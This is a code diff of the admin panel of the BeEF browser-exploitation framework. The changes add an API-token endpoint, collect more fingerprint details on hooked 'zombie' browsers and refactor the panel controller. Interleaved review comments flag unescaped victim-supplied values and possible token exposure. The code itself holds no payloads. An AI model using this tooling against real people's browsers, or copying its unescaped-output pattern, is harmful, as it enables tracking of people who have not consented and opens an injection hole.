@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension @@ -32,12 +22,19 @@ module API # retrieve the configuration class instance configuration = BeEF::Core::Configuration.instance - # registers the http controllers for the AdminUI extensions - Dir["#{$root_dir}/extensions/admin_ui/controllers/**/*.rb"].each { |http_module| + # registers the http controllers used by BeEF core (authentication, logs, modules and panel) + Dir["#{$root_dir}/extensions/admin_ui/controllers/**/*.rb"].each do |http_module| require http_module mod_name = File.basename http_module, '.rb' beef_server.mount("/ui/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name)) - } + end + + # registers the http controllers used by BeEF extensions (requester, proxy, xssrays, etc..) + Dir["#{$root_dir}/extensions/**/controllers/*.rb"].each do |http_module| + require http_module + mod_name = File.basename http_module, '.rb' + beef_server.mount("/ui/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name)) + end # mount the folder were we store static files (javascript, css, images) for the admin ui media_dir = File.dirname(__FILE__)+'/../media/' 
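Review bot: The second loop added in handler.rb mounts every file matching `extensions/**/controllers/*.rb` under `/ui/#{mod_name}` without consulting `configuration`, so as far as this hunk shows, controllers of extensions that are switched off in the config are still required and exposed over HTTP. Because `mod_name` is only the file's basename, two extensions shipping a controller with the same file name would be mounted on the same path, and how `beef_server.mount` resolves that is not visible here. I would skip disabled extensions before the `require` and add a comment such as `# mount only controllers of enabled extensions; basenames must be unique across extensions`. The two loop bodies are identical, so a single loop over both glob results would keep them from drifting apart. The enclosing method starts and ends outside the hunk.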
diff --git a/extensions/admin_ui/classes/httpcontroller.rb b/extensions/admin_ui/classes/httpcontroller.rb index 7d6c37965..68948a782 100644 --- a/extensions/admin_ui/classes/httpcontroller.rb +++ b/extensions/admin_ui/classes/httpcontroller.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/admin_ui/classes/session.rb b/extensions/admin_ui/classes/session.rb index 85b16b813..0d6990dc1 100644 --- a/extensions/admin_ui/classes/session.rb +++ b/extensions/admin_ui/classes/session.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/admin_ui/config.yaml b/extensions/admin_ui/config.yaml index dde46ca70..9259abf81 100644 --- a/extensions/admin_ui/config.yaml +++ b/extensions/admin_ui/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: extension: diff --git a/extensions/admin_ui/constants/agents.rb b/extensions/admin_ui/constants/agents.rb index 546f0b0f2..cd7d99f88 100644 
--- a/extensions/admin_ui/constants/agents.rb +++ b/extensions/admin_ui/constants/agents.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/admin_ui/constants/icons.rb b/extensions/admin_ui/constants/icons.rb index 73afc7fb3..53bc83e79 100644 --- a/extensions/admin_ui/constants/icons.rb +++ b/extensions/admin_ui/constants/icons.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension 
diff --git a/extensions/admin_ui/controllers/authentication/authentication.rb b/extensions/admin_ui/controllers/authentication/authentication.rb index f07a4f94e..78a91e46a 100644 --- a/extensions/admin_ui/controllers/authentication/authentication.rb +++ b/extensions/admin_ui/controllers/authentication/authentication.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/admin_ui/controllers/authentication/index.html b/extensions/admin_ui/controllers/authentication/index.html index 7e0dff715..c2c8e3ef9 100644 --- a/extensions/admin_ui/controllers/authentication/index.html +++ b/extensions/admin_ui/controllers/authentication/index.html @@ -1,3 +1,8 @@ + BeEF Authentication diff --git a/extensions/admin_ui/controllers/logs/logs.rb b/extensions/admin_ui/controllers/logs/logs.rb index 3759ebdec..e384dd620 100644 --- a/extensions/admin_ui/controllers/logs/logs.rb +++ b/extensions/admin_ui/controllers/logs/logs.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb index b30573a0d..74643feea 100644 --- a/extensions/admin_ui/controllers/modules/modules.rb +++ b/extensions/admin_ui/controllers/modules/modules.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension 
@@ -28,6 +18,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController def initialize super({ 'paths' => { + '/getRestfulApiToken.json' => method(:get_restful_api_token), '/select/commandmodules/all.json' => method(:select_all_command_modules), '/select/commandmodules/tree.json' => method(:select_command_modules_tree), '/select/commandmodule.json' => method(:select_command_module), @@ -43,6 +34,17 @@ class Modules < BeEF::Extension::AdminUI::HttpController @session = BeEF::Extension::AdminUI::Session.instance end + + # @note Returns the RESTful api key. Authenticated call, so callable only + # from the admin UI after successful authentication (cookie). + # -> http://127.0.0.1:3000/ui/modules/getRestfulApiToken.json + # response + # <- {"token":"800679edbb59976935d7673924caaa9e99f55c32"} + def get_restful_api_token + @body = { + 'token' => BeEF::Core::Configuration.instance.get("beef.api_token") + }.to_json + end # Returns a JSON array containing the summary for a selected zombie. def select_zombie_summary @@ -136,7 +138,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController # set and add the return values for the os name os_name = BD.get(zombie_session, 'OsName') - if not host_name.nil? + if not os_name.nil? encoded_os_name = CGI.escapeHTML(os_name) encoded_os_name_hash = { 'OS Name' => encoded_os_name } 
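Review bot: `get_restful_api_token` returns `beef.api_token` to any request that reaches it, and the only evidence that the call is authenticated is the comment, because the check itself is not in this hunk. It should be confirmed that `HttpController` rejects unauthenticated requests for every entry in `'paths'`, including the `/getRestfulApiToken.json` route added in the hunk above. Since the response body is a credential, I would also mark it non-cacheable and restrict the route to the HTTP method the UI uses, if the base class allows that. The sample response in the comment shows a token-shaped value; label it as an example, e.g. `# <- {"token":"<api token, example only>"}`, so nobody mistakes it for a default.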
@@ -148,6 +150,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController summary_grid_hash['results'].push(page_name_row) # add the row end + + # set and add the return values for the hardware name + hw_name = BD.get(zombie_session, 'Hardware') + if not hw_name.nil? + encoded_hw_name = CGI.escapeHTML(hw_name) + encoded_hw_name_hash = { 'Hardware' => encoded_hw_name } + + page_name_row = { + 'category' => 'Host', + 'data' => encoded_hw_name_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end # set and add the return values for the browser name browser_name = BD.get(zombie_session, 'BrowserName') @@ -331,6 +348,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController summary_grid_hash['results'].push(page_name_row) # add the row end + # set and add the yes|no value for hasPhonegap + has_phonegap = BD.get(zombie_session, 'hasPhonegap') + if not has_phonegap.nil? + encoded_has_phonegap = CGI.escapeHTML(has_phonegap) + encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap } + + page_name_row = { + 'category' => 'Browser', + 'data' => encoded_has_phonegap_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end + # set and add the yes|no value for HasGoogleGears has_googlegears = BD.get(zombie_session, 'HasGoogleGears') if not has_googlegears.nil? 
@@ -549,12 +581,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController # append the number of command modules so the branch name results in: " (num)" parent.each {|command_module_branch| if command_module_branch.is_a?(Hash) and command_module_branch.has_key?('children') - num_of_command_modules = command_module_branch['children'].length - command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")" - + num_of_subs = 0 command_module_branch['children'].each {|c| + #add in the submodules and subtract 1 for the folder node + num_of_subs+=c['children'].length-1 if c.has_key?('children') retitle_recursive_tree([c]) if c.has_key?('cls') and c['cls'] == 'folder' } + num_of_command_modules = command_module_branch['children'].length + num_of_subs + command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")" + end } end diff --git a/extensions/admin_ui/controllers/panel/index.html b/extensions/admin_ui/controllers/panel/index.html index 31c92c23c..4091f664d 100644 --- a/extensions/admin_ui/controllers/panel/index.html +++ b/extensions/admin_ui/controllers/panel/index.html @@ -1,3 +1,8 @@ + @@ -28,7 +33,12 @@ <%= script_tag 'ui/panel/tabs/ZombieTabRider.js' %> <%= script_tag 'ui/panel/tabs/ZombieTabXssRays.js' %> - <%= script_tag 'ui/panel/PanelViewer.js' %> + <%= script_tag 'wterm/wterm.jquery.js' %> + <%= stylesheet_tag 'wterm.css' %> + + <%= script_tag 'ui/panel/tabs/ZombieTabIpec.js' %> + + <%= script_tag 'ui/panel/PanelViewer.js' %> <%= script_tag 'ui/panel/DataGrid.js' %> <%= script_tag 'ui/panel/MainPanel.js' %> <%= script_tag 'ui/panel/ZombieTab.js' %> diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb index f50adb121..e2fe61f07 100644 --- a/extensions/admin_ui/controllers/panel/panel.rb +++ b/extensions/admin_ui/controllers/panel/panel.rb 
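Review bot: The new count in `retitle_recursive_tree` looks only one level below each branch: `num_of_subs` adds `c['children'].length-1` for the direct children, so modules nested two or more folders deep are missing from the branch total, while the recursive call on `[c]` works out that folder's own total and then discards it. Having the method return the number of leaf modules in the subtree it has just retitled, and summing those return values, would keep the " (num)" label correct at any depth. If the tree is guaranteed to be at most two levels deep, a comment such as `# counts direct children and grandchildren only` should say so. The method's signature lies outside the hunk.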
@@ -1,107 +1,118 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF -module Extension -module AdminUI -module Controllers + module Extension + module AdminUI + module Controllers # # # -class Panel < BeEF::Extension::AdminUI::HttpController - - def initialize - super({ - 'paths' => { - '/' => method(:index), - '/hooked-browser-tree-update.json' => method(:hooked_browser_tree_update) - } - }) - end - - # default index page - def index; end - - # return a JSON object contains all the updates for the hooked browser trees - def hooked_browser_tree_update - # retrieve the hbs that are online - hooked_browsers_online = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30))) - - # retrieve the hbs that are offline - hooked_browsers_offline = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30))) - - # retrieve the distributed engine rules that are enabled - distributed_engine_rules = distributed_engine_rules_2_json_simple(BeEF::Core::DistributedEngine::Models::Rules.all(:enabled => true)) - - # hash that gets populated with all the information for the hb trees - ret = { - 'success' => true, - - # the list of hb - 'hooked-browsers' => { - 'online' => 
hooked_browsers_online, - 'offline' => hooked_browsers_offline - }, - - # the rules for the distributed engine - 'ditributed-engine-rules' => distributed_engine_rules - } - - @body = ret.to_json - end - - # Takes a list distributed engine rules and format the results into JSON - def distributed_engine_rules_2_json_simple(rules) + class Panel < BeEF::Extension::AdminUI::HttpController - end - - # Takes a list of zombies and format the results in a JSON array. - def zombies2json_simple(zombies) - zombies_hash = {} - i = 0 - - zombies.each do |zombie| - # create hash of zombie details - zombies_hash[i] = (get_simple_hooked_browser_hash(zombie)) - i+=1 + def initialize + super({ + 'paths' => { + '/' => method(:index), + '/hooked-browser-tree-update.json' => method(:hooked_browser_tree_update) + } + }) + end + + # default index page + def index; + end + + # return a JSON object contains all the updates for the hooked browser trees + def hooked_browser_tree_update + # retrieve the hbs that are online + hooked_browsers_online = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30))) + + # retrieve the hbs that are offline + hooked_browsers_offline = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30))) + + # retrieve the distributed engine rules that are enabled + distributed_engine_rules = distributed_engine_rules_2_json_simple(BeEF::Core::DistributedEngine::Models::Rules.all(:enabled => true)) + + # hash that gets populated with all the information for the hb trees + ret = { + 'success' => true, + + # the list of hb + 'hooked-browsers' => { + 'online' => hooked_browsers_online, + 'offline' => hooked_browsers_offline + }, + + # the rules for the distributed engine + 'ditributed-engine-rules' => distributed_engine_rules + } + + @body = ret.to_json + end + + # Takes a list distributed engine rules and format the results into JSON + def distributed_engine_rules_2_json_simple(rules) + + end 
+ + # Takes a list of zombies and format the results in a JSON array. + def zombies2json_simple(zombies) + zombies_hash = {} + i = 0 + + zombies.each do |zombie| + # create hash of zombie details + zombies_hash[i] = (get_simple_hooked_browser_hash(zombie)) + i+=1 + end + + zombies_hash + end + + # create a hash of simple hooked browser details + def get_simple_hooked_browser_hash(hooked_browser) + + browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName') + browser_version = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserVersion') + browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session) + os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session) + os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName') + hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session) + hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware') + domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName') + has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash') + has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket') + has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears') + has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled') + date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp') + + return { + 'session' => hooked_browser.session, + 'ip' => hooked_browser.ip, + 'domain' => domain, + 'port' => hooked_browser.port.to_s, + 'browser_name' => browser_name, + 'browser_version' => browser_version, + 'browser_icon' => browser_icon, + 'os_icon' => os_icon, + 'os_name' => os_name, + 'hw_icon' => hw_icon, + 'hw_name' => hw_name, + 'has_flash' => has_flash, + 'has_web_sockets' => has_web_sockets, + 
'has_googlegears' => has_googlegears, + 'has_java' => has_java, + 'date_stamp' => date_stamp + } + + end + end + + end end - - zombies_hash - end - - # create a hash of simple hooked browser details - def get_simple_hooked_browser_hash(hooked_browser) - - browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session) - os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session) - domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName') - - return { - 'session' => hooked_browser.session, - 'ip' => hooked_browser.ip, - 'domain' => domain, - 'port' => hooked_browser.port.to_s, - 'browser_icon' => browser_icon, - 'os_icon' => os_icon - } - end end - -end -end -end -end diff --git a/extensions/admin_ui/extension.rb b/extensions/admin_ui/extension.rb index 041d30d30..1ce500b0e 100644 --- a/extensions/admin_ui/extension.rb +++ b/extensions/admin_ui/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/admin_ui/handlers/ui.rb b/extensions/admin_ui/handlers/ui.rb index 3bfc0da3a..8a375aa52 100644 --- a/extensions/admin_ui/handlers/ui.rb +++ b/extensions/admin_ui/handlers/ui.rb 
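Review bot: `get_simple_hooked_browser_hash` now returns `browser_name`, `browser_version`, `os_name`, `hw_name` and the other `BrowserDetails` values exactly as stored, whereas `modules.rb` in this same commit passes the same fields through `CGI.escapeHTML` before returning them. These values are reported by the hooked browser, and the tree code later in the commit concatenates them into the `text` and `balloon_text` strings, which appear to be rendered as markup in the admin UI. I would encode them at this boundary, for example `'hw_name' => CGI.escapeHTML(hw_name.to_s),` for each detail field (assuming `CGI` is loaded for this controller as it is for `Modules`), or encode on the client before the balloon string is built. Separately, `distributed_engine_rules_2_json_simple` has an empty body, so it returns nil into the `'ditributed-engine-rules'` entry of the response.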
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # # Generic Http Handler that extensions can use to register http diff --git a/extensions/admin_ui/media/css/base.css b/extensions/admin_ui/media/css/base.css index ca32174a6..516acd487 100644 --- a/extensions/admin_ui/media/css/base.css +++ b/extensions/admin_ui/media/css/base.css @@ -1,18 +1,9 @@ /* - * Copyright 2012 Wade Alcorn wade@bindshell.net - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission */ + #header .right-menu { float: right; margin: 10px; 
diff --git a/extensions/admin_ui/media/css/ext-all.css b/extensions/admin_ui/media/css/ext-all.css index 7e56a6030..230fbd0ae 100644 --- a/extensions/admin_ui/media/css/ext-all.css +++ b/extensions/admin_ui/media/css/ext-all.css @@ -1,18 +1,9 @@ /* - * Copyright 2012 Wade Alcorn wade@bindshell.net - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission */ + /*! * Ext JS Library 3.3.1 * Copyright(c) 2006-2010 Sencha Inc. diff --git a/extensions/admin_ui/media/css/wterm.css b/extensions/admin_ui/media/css/wterm.css new file mode 100644 index 000000000..45217e860 --- /dev/null +++ b/extensions/admin_ui/media/css/wterm.css 
@@ -0,0 +1,19 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + +/* Basic Terminal CSS */ +.wterm_terminal { background: #000; color: #fff; font-size: 1em; font-family: monospace; padding: 3px; width: 100%; height: 100%; display: block; overflow-x: none; overflow-y: auto; } + +/* TODO: Input Box Width is faulty */ +.wterm_terminal input { background: transparent; border: 0; color: #fff; width: 100%; font-size: 1em; font-family: monospace; outline: none; } +.wterm_terminal div:first { margin-bottom: 1em; } +.wterm_terminal .wterm_prompt { float: left; clear: left; } +.wterm_terminal form { float: left; margin: 0px; width: 75%; } + +/* Themes */ +.wterm_theme_green_on_black { background: #000; color: #0f0; } +.wterm_theme_green_on_black input { background: transparent; border: 0; color: #0f0; } + diff --git a/extensions/admin_ui/media/images/icons/htc.ico b/extensions/admin_ui/media/images/icons/htc.ico new file mode 100644 index 000000000..a4b722423 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/htc.ico differ diff --git a/extensions/admin_ui/media/images/icons/ios.png b/extensions/admin_ui/media/images/icons/ios.png new file mode 100644 index 000000000..a3477139c Binary files /dev/null and b/extensions/admin_ui/media/images/icons/ios.png differ diff --git a/extensions/admin_ui/media/images/icons/iphone.jpg b/extensions/admin_ui/media/images/icons/iphone.jpg new file mode 100644 index 000000000..134b5c9f9 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/iphone.jpg differ diff --git a/extensions/admin_ui/media/images/icons/iphone.png b/extensions/admin_ui/media/images/icons/iphone.png deleted file mode 100644 index ab4a8cc31..000000000 Binary files a/extensions/admin_ui/media/images/icons/iphone.png and /dev/null differ 
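Review bot: Two parts of the new `wterm.css` are not valid CSS and will be dropped by browsers: `overflow-x: none` in `.wterm_terminal` (the accepted keywords are `visible`, `hidden`, `scroll` and `auto`) and the selector `.wterm_terminal div:first`, which is jQuery selector syntax rather than a CSS pseudo-class. I would write `overflow-x: hidden;` and `.wterm_terminal div:first-child { margin-bottom: 1em; }`.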
diff --git a/extensions/admin_ui/media/images/icons/kindle.png b/extensions/admin_ui/media/images/icons/kindle.png new file mode 100644 index 000000000..b858fc003 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/kindle.png differ diff --git a/extensions/admin_ui/media/images/icons/motorola.png b/extensions/admin_ui/media/images/icons/motorola.png new file mode 100644 index 000000000..fee6d6e65 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/motorola.png differ diff --git a/extensions/admin_ui/media/images/icons/nexus.png b/extensions/admin_ui/media/images/icons/nexus.png new file mode 100644 index 000000000..16ffc743b Binary files /dev/null and b/extensions/admin_ui/media/images/icons/nexus.png differ diff --git a/extensions/admin_ui/media/images/icons/nokia.ico b/extensions/admin_ui/media/images/icons/nokia.ico new file mode 100644 index 000000000..fe5497301 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/nokia.ico differ diff --git a/extensions/admin_ui/media/images/icons/pc.png b/extensions/admin_ui/media/images/icons/pc.png new file mode 100644 index 000000000..d8f38aca7 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/pc.png differ diff --git a/extensions/admin_ui/media/images/icons/sony_ericsson.png b/extensions/admin_ui/media/images/icons/sony_ericsson.png new file mode 100644 index 000000000..1dab4a8d2 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/sony_ericsson.png differ diff --git a/extensions/admin_ui/media/images/icons/webos.png b/extensions/admin_ui/media/images/icons/webos.png new file mode 100644 index 000000000..d5c0b70d7 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/webos.png differ diff --git a/extensions/admin_ui/media/images/icons/zune.gif b/extensions/admin_ui/media/images/icons/zune.gif new file mode 100644 index 000000000..6d8259b13 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/zune.gif differ 
diff --git a/extensions/admin_ui/media/javascript/esapi/Class.create.js b/extensions/admin_ui/media/javascript/esapi/Class.create.js index 4c7d8891b..81fc6ad5e 100644 --- a/extensions/admin_ui/media/javascript/esapi/Class.create.js +++ b/extensions/admin_ui/media/javascript/esapi/Class.create.js @@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + /* Simple JavaScript Inheritance * By John Resig http://ejohn.org/ * MIT Licensed. diff --git a/extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js b/extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js index d120d8c74..d05281662 100644 --- a/extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js +++ b/extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js 
